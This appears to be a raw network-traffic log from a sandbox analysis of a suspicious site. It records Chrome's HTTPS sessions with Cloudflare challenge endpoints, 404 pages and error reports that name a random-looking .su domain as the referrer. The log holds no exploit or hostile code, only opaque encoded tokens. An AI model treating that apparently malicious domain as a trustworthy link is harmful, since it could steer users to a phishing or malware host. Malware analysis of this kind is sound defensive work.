                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iTeNAWxr0xRfH76oRCPWcTrx8pz%2BGzVg5zwH1ZOx8WDMMbEFwG9k1nIyX5Umcm3QItD0YuV5KfQwVtyWm40Lz1IFnUGXUPi96PkPZ07LalbPfuAaacYKQlosUuASIQM1uqmt9850ctn4nBsdq6swudzUCxs9"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 84a8fea58d4f4583-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:00 UTC700INData Raw: 34 38 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61
                                                          Data Ascii: 488<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica
                                                          2024-01-24 14:34:00 UTC467INData Raw: 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c
                                                          Data Ascii: style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><
                                                          2024-01-24 14:34:00 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                          Data Ascii: 1
                                                          2024-01-24 14:34:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.649734104.17.2.1844432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:00 UTC915OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/655695331:1706105503:NvTe9F65H4Ha20SvtcR2YZxrWN67aApM_5bJtlGEiLs/84a8fe9b2b47507e/2f47f656679f8e4 HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          Content-Length: 3004
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Content-type: application/x-www-form-urlencoded
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          CF-Challenge: 2f47f656679f8e4
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Origin: https://challenges.cloudflare.com
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nbltc/0x4AAAAAAAQcAKAiG1Sgzcix/auto/normal
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-01-24 14:34:00 UTC3004OUTData Raw: 76 5f 38 34 61 38 66 65 39 62 32 62 34 37 35 30 37 65 3d 61 6f 59 4f 41 4f 72 4f 52 4f 65 4f 34 4f 6b 34 6c 37 4f 6e 37 4f 64 50 42 5a 42 30 4e 75 42 34 37 42 24 4e 79 4d 42 78 74 42 4e 39 34 48 42 70 42 4f 64 34 38 50 72 34 42 67 42 25 32 62 76 50 6e 50 42 78 35 48 42 38 47 42 46 34 59 4e 32 6e 67 4f 4c 64 4f 74 4f 73 24 42 78 4f 38 57 73 42 7a 69 63 39 42 4c 4c 34 38 35 4e 42 4c 6b 41 42 6f 51 71 34 49 34 42 4e 66 5a 48 42 36 4f 6c 54 67 35 42 59 37 72 42 2b 4f 73 73 49 6c 7a 5a 71 33 51 34 61 4b 73 30 42 4f 42 6b 4e 38 72 64 42 4e 73 42 77 37 42 4a 42 30 50 42 67 7a 56 54 42 43 66 42 4c 4a 71 6e 61 6b 6f 42 67 72 66 42 4c 34 4e 63 59 53 52 33 4c 79 48 42 73 44 62 73 24 4f 42 56 50 72 50 42 2b 72 53 74 43 56 51 49 36 48 72 6f 57 39 34 45 42 44 62 65 58
                                                          Data Ascii: v_84a8fe9b2b47507e=aoYOAOrOROeO4Ok4l7On7OdPBZB0NuB47B$NyMBxtBN94HBpBOd48Pr4BgB%2bvPnPBx5HB8GBF4YN2ngOLdOtOs$BxO8WsBzic9BLL485NBLkABoQq4I4BNfZHB6OlTg5BY7rB+OssIlzZq3Q4aKs0BOBkN8rdBNsBw7BJB0PBgzVTBCfBLJqnakoBgrfBL4NcYSR3LyHBsDbs$OBVPrPB+rStCVQI6HroW94EBDbeX
                                                          2024-01-24 14:34:00 UTC647INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:34:00 GMT
                                                          Content-Type: text/plain; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-chl-gen: GLh9tpErO3+SyAf92ltHFj4H9Kt/Vw5IxowMD0I/WNIEqf/cA7KotEkEgCPRhjoFu+DAgG3HjpiSDyvMp5MMFOxEWaC6yt5SsKiS2dE2dGTaSGdFKLYL/5hgeI1T+vtA+T+wOptiL9JdHPFxDWMwk4/hct7FNtQkeFzRKwozaVLIxnDNK6MY23PjFsD3ETmlPwQTvWJVtf7/h+yTkm2poRnOsRHGasrc4F9AOcI03D3lwkzjLxsEHI9iEU1Z0VYjwsodBV04WKCtJLh+m7uV5xxB6VUEaJDFlYn47iyqbWoRhWebIZRt0Zt/73b7G5402qQaAytl2pLWzhcrKMU1Dm0KkMQUq7/zYBd+owMIiER0mJtAKIDBc9vKbtPnUIaO$PD6uLvYgvNdPvo6VwhmcHg==
                                                          Server: cloudflare
                                                          CF-RAY: 84a8fea70dc8b051-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:00 UTC722INData Raw: 37 64 32 38 0d 0a 66 4c 69 38 75 35 39 37 67 5a 71 6b 70 4a 4b 34 6f 5a 65 70 75 6f 75 43 6d 62 2b 54 69 73 2f 57 71 72 4f 74 77 74 48 63 6c 39 76 65 6e 39 62 50 6f 4e 44 57 34 71 4f 6f 71 65 75 70 33 4b 79 39 75 64 33 76 35 4c 7a 4f 79 66 44 57 34 64 44 37 7a 76 72 6e 7a 38 6a 4a 41 50 43 35 39 4d 58 31 41 72 37 5a 43 4e 51 4c 42 42 44 67 45 51 41 45 35 42 58 31 45 68 4c 4b 42 42 6a 6b 47 78 44 74 39 4f 6f 67 48 76 63 6b 34 69 6a 6b 38 75 6a 35 39 69 33 6f 4a 41 51 77 36 43 59 48 44 79 51 6a 4d 75 6f 57 4f 41 55 38 42 6a 55 55 47 77 6f 36 46 30 59 53 4d 78 6c 4a 4a 45 77 4a 54 51 30 65 47 6b 45 52 54 69 4e 53 45 55 34 70 4d 78 51 75 4a 78 55 7a 54 46 55 2b 59 6d 45 75 58 47 55 69 59 53 51 68 49 55 6b 6c 4a 53 56 46 59 6c 30 2f 54 46 42 58 63 30 35 71 62
                                                          Data Ascii: 7d28fLi8u597gZqkpJK4oZepuouCmb+Tis/WqrOtwtHcl9ven9bPoNDW4qOoqeup3Ky9ud3v5LzOyfDW4dD7zvrnz8jJAPC59MX1Ar7ZCNQLBBDgEQAE5BX1EhLKBBjkGxDt9OogHvck4ijk8uj59i3oJAQw6CYHDyQjMuoWOAU8BjUUGwo6F0YSMxlJJEwJTQ0eGkERTiNSEU4pMxQuJxUzTFU+YmEuXGUiYSQhIUklJSVFYl0/TFBXc05qb
                                                          2024-01-24 14:34:00 UTC1369INData Raw: 6d 4b 32 74 30 4a 71 35 31 36 37 67 6e 74 75 79 35 4a 37 66 74 75 6d 7a 34 37 72 73 72 75 65 2b 38 4f 58 72 77 76 54 78 37 38 62 34 31 2f 50 4b 2f 4f 33 33 7a 67 50 54 2b 39 49 48 30 77 44 57 43 2b 51 4a 78 73 58 58 7a 64 72 4d 36 51 49 42 30 42 67 4b 44 4f 76 30 32 4e 72 34 38 78 48 66 34 52 48 33 4a 2f 72 2b 39 79 6f 42 44 4f 58 6f 42 51 34 6d 38 41 7a 70 37 76 30 43 44 44 55 50 42 43 34 64 44 54 34 79 4c 78 51 62 45 42 45 67 42 51 63 67 47 30 73 2b 47 52 6b 6f 48 42 77 62 55 55 51 77 4e 43 6b 4b 4b 45 70 44 4e 6c 68 59 52 7a 5a 57 57 6a 56 45 49 45 42 55 50 46 39 6f 58 57 63 2b 53 6b 55 75 62 6d 52 6b 4e 46 52 54 4e 32 5a 79 54 46 63 35 53 32 39 39 63 44 63 36 51 34 46 76 52 55 64 31 61 59 57 49 53 58 75 49 51 58 32 49 59 55 6c 2b 58 57 71 58 55 31 42
                                                          Data Ascii: mK2t0Jq5167gntuy5J7ftumz47rsrue+8OXrwvTx78b41/PK/O33zgPT+9IH0wDWC+QJxsXXzdrM6QIB0BgKDOv02Nr48xHf4RH3J/r+9yoBDOXoBQ4m8Azp7v0CDDUPBC4dDT4yLxQbEBEgBQcgG0s+GRkoHBwbUUQwNCkKKEpDNlhYRzZWWjVEIEBUPF9oXWc+SkUubmRkNFRTN2ZyTFc5S299cDc6Q4FvRUd1aYWISXuIQX2IYUl+XWqXU1B
                                                          2024-01-24 14:34:00 UTC1369INData Raw: 4c 4b 31 79 2b 53 32 78 63 66 45 34 65 4b 6a 34 63 61 6d 34 73 2f 4e 35 75 58 54 77 73 44 70 31 38 54 55 37 64 76 4a 79 50 48 66 7a 41 50 31 34 38 2f 6b 78 51 66 68 31 51 4c 62 39 73 72 50 79 76 33 37 36 66 4d 4a 45 4f 33 70 32 4e 62 72 36 50 34 5a 45 2f 6a 75 49 68 7a 66 2f 52 73 43 2f 43 55 61 42 78 6b 6c 4b 67 67 63 45 79 34 4d 49 78 63 79 45 43 67 62 4e 68 51 75 4b 76 30 54 2f 41 45 7a 48 76 31 41 4e 79 55 43 46 78 31 45 52 55 34 42 54 41 6c 42 45 43 55 52 44 68 63 7a 55 43 64 5a 46 31 51 72 58 52 64 59 4c 32 49 73 58 44 4e 6c 4a 32 41 33 61 56 35 6b 4f 32 31 71 55 43 30 39 61 55 77 6f 61 6a 4e 32 5a 6c 4d 35 65 6d 74 55 53 6e 35 74 62 45 42 32 57 49 4d 2b 57 49 74 68 56 32 57 50 65 45 4a 2f 54 6f 53 47 67 56 43 44 56 31 65 53 55 6e 53 46 6b 6c 75 52
                                                          Data Ascii: LK1y+S2xcfE4eKj4cam4s/N5uXTwsDp18TU7dvJyPHfzAP148/kxQfh1QLb9srPyv376fMJEO3p2Nbr6P4ZE/juIhzf/RsC/CUaBxklKggcEy4MIxcyECgbNhQuKv0T/AEzHv1ANyUCFx1ERU4BTAlBECURDhczUCdZF1QrXRdYL2IsXDNlJ2A3aV5kO21qUC09aUwoajN2ZlM5emtUSn5tbEB2WIM+WIthV2WPeEJ/ToSGgVCDV1eSUnSFkluR
                                                          2024-01-24 14:34:00 UTC1369INData Raw: 58 66 70 5a 7a 63 74 73 62 75 76 62 32 38 72 64 7a 55 35 65 54 78 78 76 58 70 74 76 54 50 32 72 7a 55 32 66 44 4d 41 66 72 62 38 51 62 48 35 50 7a 36 44 67 4d 44 33 73 34 44 42 2b 6f 48 34 75 66 67 41 78 49 64 2b 2f 44 65 30 64 6f 65 44 65 45 4f 33 76 72 6c 47 43 51 6d 2b 2f 67 50 4b 53 4d 4a 2b 67 51 77 45 78 49 7a 47 66 58 32 38 67 55 50 2f 66 77 56 4c 68 64 45 2b 30 59 6c 4a 51 51 66 4b 43 67 70 4f 43 73 49 43 45 30 4e 55 30 74 52 56 52 5a 54 4a 45 78 51 4d 30 6f 31 58 55 6f 77 4b 31 38 6a 4c 7a 31 42 4e 6a 59 31 59 55 49 37 53 32 35 6f 63 55 70 6e 54 6b 64 78 5a 6c 4e 6a 63 58 5a 55 61 56 39 36 57 47 78 6a 66 6c 78 7a 5a 34 4a 67 64 6d 75 47 5a 48 78 76 69 6d 69 43 66 6c 4a 6e 55 56 57 48 63 6c 4b 55 69 33 6c 57 61 33 47 5a 66 5a 52 68 65 57 56 33 70
                                                          Data Ascii: XfpZzctsbuvb28rdzU5eTxxvXptvTP2rzU2fDMAfrb8QbH5Pz6DgMD3s4DB+oH4ufgAxId+/De0doeDeEO3vrlGCQm+/gPKSMJ+gQwExIzGfX28gUP/fwVLhdE+0YlJQQfKCgpOCsICE0NU0tRVRZTJExQM0o1XUowK18jLz1BNjY1YUI7S25ocUpnTkdxZlNjcXZUaV96WGxjflxzZ4JgdmuGZHxvimiCflJnUVWHclKUi3lWa3GZfZRheWV3p
                                                          2024-01-24 14:34:00 UTC1369INData Raw: 65 35 73 79 71 70 4d 44 4d 36 4f 65 33 7a 65 61 32 35 39 33 76 75 64 58 63 37 75 47 37 76 2f 41 45 2b 2f 59 43 42 2f 67 49 33 4d 54 38 7a 4e 38 43 79 76 58 6b 46 67 34 56 35 68 4c 6d 2b 75 38 5a 32 64 73 4d 49 67 48 67 42 77 45 6a 2b 68 76 6e 47 43 59 62 2f 68 77 41 49 52 54 38 36 67 6b 50 4c 6a 59 6d 4c 50 73 63 48 45 44 37 47 78 34 33 47 51 4a 45 47 52 34 79 4f 52 70 47 48 45 64 4a 55 54 74 49 4a 68 52 51 4d 43 55 59 46 6a 45 54 52 7a 6f 32 59 45 6b 73 56 30 45 6b 4e 44 39 61 4b 47 4a 4c 53 6a 63 6a 5a 30 39 66 59 6a 70 6b 50 30 39 74 51 33 6b 79 52 31 46 47 63 54 5a 49 51 48 55 36 54 56 46 35 50 6c 46 64 52 34 69 49 67 59 31 66 59 6e 69 52 59 33 4a 30 63 59 36 50 6c 35 70 32 55 31 57 53 6a 4a 61 54 67 48 39 78 6c 6f 52 78 6c 35 71 49 64 49 57 65 6a 48
                                                          Data Ascii: e5syqpMDM6Oe3zea2593vudXc7uG7v/AE+/YCB/gI3MT8zN8CyvXkFg4V5hLm+u8Z2dsMIgHgBwEj+hvnGCYb/hwAIRT86gkPLjYmLPscHED7Gx43GQJEGR4yORpGHEdJUTtIJhRQMCUYFjETRzo2YEksV0EkND9aKGJLSjcjZ09fYjpkP09tQ3kyR1FGcTZIQHU6TVF5PlFdR4iIgY1fYniRY3J0cY6Pl5p2U1WSjJaTgH9xloRxl5qIdIWejH
                                                          2024-01-24 14:34:00 UTC1369INData Raw: 76 72 4c 4c 39 73 72 36 36 65 6a 63 7a 64 44 76 34 66 62 54 39 4e 50 36 38 76 66 63 35 4f 67 4e 33 52 44 62 42 2b 48 4c 37 77 62 6f 38 4f 38 51 37 65 63 58 48 66 37 33 33 68 7a 32 37 42 34 63 39 42 73 45 46 66 77 45 49 68 6b 50 43 51 51 6f 41 66 7a 72 4b 41 6f 52 38 6a 4d 4a 46 52 41 70 48 51 34 51 4e 78 4e 44 4d 6b 41 6b 41 52 67 31 48 53 52 43 4f 53 38 70 4a 45 67 68 48 51 78 49 4b 6a 45 54 55 79 6b 31 4d 45 6b 39 4c 6a 42 58 4d 32 4e 53 59 45 51 68 4f 47 45 39 52 56 35 71 51 46 34 73 57 31 78 6b 51 47 42 46 5a 32 4e 69 5a 47 6f 37 64 46 46 75 4f 33 6c 68 55 6c 56 30 57 57 46 6c 63 6e 52 37 58 49 78 68 66 30 75 49 5a 46 31 55 66 34 43 4c 61 59 4b 45 69 34 61 4c 63 58 6c 34 6e 33 4f 54 6a 70 4b 46 64 6e 69 58 66 49 57 41 70 49 4e 35 6b 4b 79 51 61 32 61
                                                          Data Ascii: vrLL9sr66ejczdDv4fbT9NP68vfc5OgN3RDbB+HL7wbo8O8Q7ecXHf733hz27B4c9BsEFfwEIhkPCQQoAfzrKAoR8jMJFRApHQ4QNxNDMkAkARg1HSRCOS8pJEghHQxIKjETUyk1MEk9LjBXM2NSYEQhOGE9RV5qQF4sW1xkQGBFZ2NiZGo7dFFuO3lhUlV0WWFlcnR7XIxhf0uIZF1Uf4CLaYKEi4aLcXl4n3OTjpKFdniXfIWApIN5kKyQa2a
                                                          2024-01-24 14:34:00 UTC1369INData Raw: 65 66 6d 74 65 72 4e 36 39 48 4d 41 37 76 44 77 4e 6a 70 43 64 73 4c 78 41 66 6f 35 74 45 43 37 67 41 4e 45 75 38 48 2b 68 62 7a 43 76 34 61 39 78 41 44 48 76 73 57 45 75 58 36 35 4f 67 62 42 75 55 6f 48 77 33 70 2f 67 55 74 49 2f 30 33 44 41 37 31 2b 51 38 65 47 2f 59 5a 4f 41 39 42 2f 6a 77 54 52 51 42 46 41 79 63 55 43 68 63 49 43 54 34 39 44 51 30 30 54 7a 38 56 52 46 55 72 44 6a 35 54 56 78 31 4a 56 56 6f 76 51 7a 68 68 49 69 52 55 61 6b 68 57 58 6d 45 77 5a 6c 6f 73 55 55 35 4e 61 57 39 48 64 6a 52 46 61 45 38 31 57 47 35 43 4f 59 49 38 55 34 63 2f 61 56 6d 44 59 49 56 49 61 6e 2b 43 63 6d 71 53 68 57 36 4a 67 6f 69 4a 69 55 35 72 65 35 39 57 6e 48 78 32 6d 58 57 63 57 61 4e 36 65 34 6d 6e 66 35 39 73 6e 4b 71 66 67 36 43 45 70 5a 69 42 62 34 32 54
                                                          Data Ascii: efmterN69HMA7vDwNjpCdsLxAfo5tEC7gANEu8H+hbzCv4a9xADHvsWEuX65OgbBuUoHw3p/gUtI/03DA71+Q8eG/YZOA9B/jwTRQBFAycUChcICT49DQ00Tz8VRFUrDj5TVx1JVVovQzhhIiRUakhWXmEwZlosUU5NaW9HdjRFaE81WG5COYI8U4c/aVmDYIVIan+CcmqShW6JgoiJiU5re59WnHx2mXWcWaN6e4mnf59snKqfg6CEpZiBb42T
                                                          2024-01-24 14:34:00 UTC1369INData Raw: 6e 4f 34 4f 4d 43 42 66 33 69 30 73 6a 4a 79 75 76 59 34 74 48 50 79 77 4c 71 7a 64 4d 57 2b 50 6a 30 42 76 76 38 32 2f 77 42 41 76 41 67 42 51 62 38 4a 51 49 49 47 77 34 4c 44 66 77 74 45 42 41 66 46 51 34 47 45 53 67 58 47 50 4d 62 4d 42 51 67 4f 66 34 58 4f 78 67 62 42 6a 51 31 4d 6a 73 57 4a 55 42 49 50 45 34 78 56 44 38 64 50 7a 59 74 52 45 55 6e 4b 55 6f 39 50 45 39 64 50 31 68 68 5a 6a 6b 31 56 57 6f 35 49 56 6b 71 50 45 68 65 58 55 46 4e 62 53 39 47 53 55 78 78 4f 44 70 70 55 58 30 78 55 33 77 2b 57 6c 4e 50 58 6e 64 57 56 6c 56 47 59 57 78 68 65 30 65 4c 59 32 6c 66 54 6c 39 66 59 5a 46 58 57 34 69 4a 56 4a 6d 59 6a 32 35 72 6d 6c 2b 66 68 47 64 6a 67 32 4e 6f 6d 4a 68 38 6f 36 4b 52 6b 49 57 57 6e 71 70 77 6c 35 65 4a 69 62 6d 63 6e 4b 75 66 72
                                                          Data Ascii: nO4OMCBf3i0sjJyuvY4tHPywLqzdMW+Pj0Bvv82/wBAvAgBQb8JQIIGw4LDfwtEBAfFQ4GESgXGPMbMBQgOf4XOxgbBjQ1MjsWJUBIPE4xVD8dPzYtREUnKUo9PE9dP1hhZjk1VWo5IVkqPEheXUFNbS9GSUxxODppUX0xU3w+WlNPXndWVlVGYWxhe0eLY2lfTl9fYZFXW4iJVJmYj25rml+fhGdjg2NomJh8o6KRkIWWnqpwl5eJibmcnKufr
                                                          2024-01-24 14:34:00 UTC1369INData Raw: 42 79 67 58 44 7a 4f 58 6d 45 4d 6b 4e 7a 4f 58 74 30 2b 77 45 44 74 72 56 37 66 37 39 45 41 6e 33 46 77 7a 76 46 43 44 78 46 76 37 6a 49 42 37 38 37 53 48 36 43 7a 4d 4c 43 67 49 4a 4e 53 34 32 46 42 45 31 4c 67 67 53 4d 78 33 34 4a 43 45 42 4c 7a 45 6c 47 67 56 4a 46 77 41 38 49 45 4e 4e 54 43 52 49 51 55 59 79 55 56 67 72 4d 6b 35 50 53 30 30 72 48 6d 51 33 58 44 45 64 4f 47 42 65 58 55 42 65 51 6a 68 43 53 6c 30 76 61 6a 42 30 61 31 4a 55 54 48 6c 4f 4f 56 4a 76 57 6a 70 38 63 32 45 2b 55 31 6c 2b 69 6d 6d 4d 54 49 79 4a 52 57 4a 4c 62 31 43 49 59 49 36 4c 57 47 68 30 6a 6d 57 5a 64 58 32 50 6b 6f 70 38 5a 4b 4e 38 6e 32 46 33 6f 32 57 6c 64 33 6c 6c 67 4b 69 6d 70 59 69 6d 69 6f 43 4b 6b 71 56 33 73 6e 69 38 73 35 71 63 6c 4d 47 57 67 5a 71 33 6f 6f
                                                          Data Ascii: BygXDzOXmEMkNzOXt0+wEDtrV7f79EAn3FwzvFCDxFv7jIB787SH6CzMLCgIJNS42FBE1LggSMx34JCEBLzElGgVJFwA8IENNTCRIQUYyUVgrMk5PS00rHmQ3XDEdOGBeXUBeQjhCSl0vajB0a1JUTHlOOVJvWjp8c2E+U1l+immMTIyJRWJLb1CIYI6LWGh0jmWZdX2Pkop8ZKN8n2F3o2Wld3llgKimpYimioCKkqV3sni8s5qclMGWgZq3oo


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.64973635.190.80.14432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:01 UTC573OUTOPTIONS /report/v3?s=iTeNAWxr0xRfH76oRCPWcTrx8pz%2BGzVg5zwH1ZOx8WDMMbEFwG9k1nIyX5Umcm3QItD0YuV5KfQwVtyWm40Lz1IFnUGXUPi96PkPZ07LalbPfuAaacYKQlosUuASIQM1uqmt9850ctn4nBsdq6swudzUCxs9 HTTP/1.1
                                                          Host: a.nel.cloudflare.com
                                                          Connection: keep-alive
                                                          Origin: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su
                                                          Access-Control-Request-Method: POST
                                                          Access-Control-Request-Headers: content-type
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-01-24 14:34:01 UTC336INHTTP/1.1 200 OK
                                                          Content-Length: 0
                                                          access-control-max-age: 86400
                                                          access-control-allow-methods: OPTIONS, POST
                                                          access-control-allow-origin: *
                                                          access-control-allow-headers: content-length, content-type
                                                          date: Wed, 24 Jan 2024 14:34:00 GMT
                                                          Via: 1.1 google
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.64973735.190.80.14432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:01 UTC496OUTPOST /report/v3?s=iTeNAWxr0xRfH76oRCPWcTrx8pz%2BGzVg5zwH1ZOx8WDMMbEFwG9k1nIyX5Umcm3QItD0YuV5KfQwVtyWm40Lz1IFnUGXUPi96PkPZ07LalbPfuAaacYKQlosUuASIQM1uqmt9850ctn4nBsdq6swudzUCxs9 HTTP/1.1
                                                          Host: a.nel.cloudflare.com
                                                          Connection: keep-alive
                                                          Content-Length: 470
                                                          Content-Type: application/reports+json
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-01-24 14:34:01 UTC470OUTData Raw: 5b 7b 22 61 67 65 22 3a 34 30 32 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 33 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 69 61 6a 6a 66 68 6b 62 71 6e 6b 72 6e 72 79 65 6a 6e 2e 79 70 69 71 7a 78 78 37 77 6f 63 73 2e 73 75 2f 41 64 38 39 4e 4c 54 53 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 39 39 2e 31 37 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d
                                                          Data Ascii: [{"age":402,"body":{"elapsed_time":336,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/Ad89NLTS/","sampling_fraction":1.0,"server_ip":"172.67.199.173","status_code":404,"type":"http.error"}
                                                          2024-01-24 14:34:01 UTC168INHTTP/1.1 200 OK
                                                          Content-Length: 0
                                                          date: Wed, 24 Jan 2024 14:34:01 GMT
                                                          Via: 1.1 google
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.649738104.17.3.1844432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:01 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/655695331:1706105503:NvTe9F65H4Ha20SvtcR2YZxrWN67aApM_5bJtlGEiLs/84a8fe9b2b47507e/2f47f656679f8e4 HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-01-24 14:34:02 UTC386INHTTP/1.1 400 Bad Request
                                                          Date: Wed, 24 Jan 2024 14:34:02 GMT
                                                          Content-Type: application/json
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          cf-chl-out: Yo3tazKD/nZDcekVJJFHPg==$NhJ8sHvRAFjSLOXlHujrYA==
                                                          Server: cloudflare
                                                          CF-RAY: 84a8feb32c0f6775-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:02 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                          Data Ascii: 7invalid
                                                          2024-01-24 14:34:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.649739104.17.2.1844432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
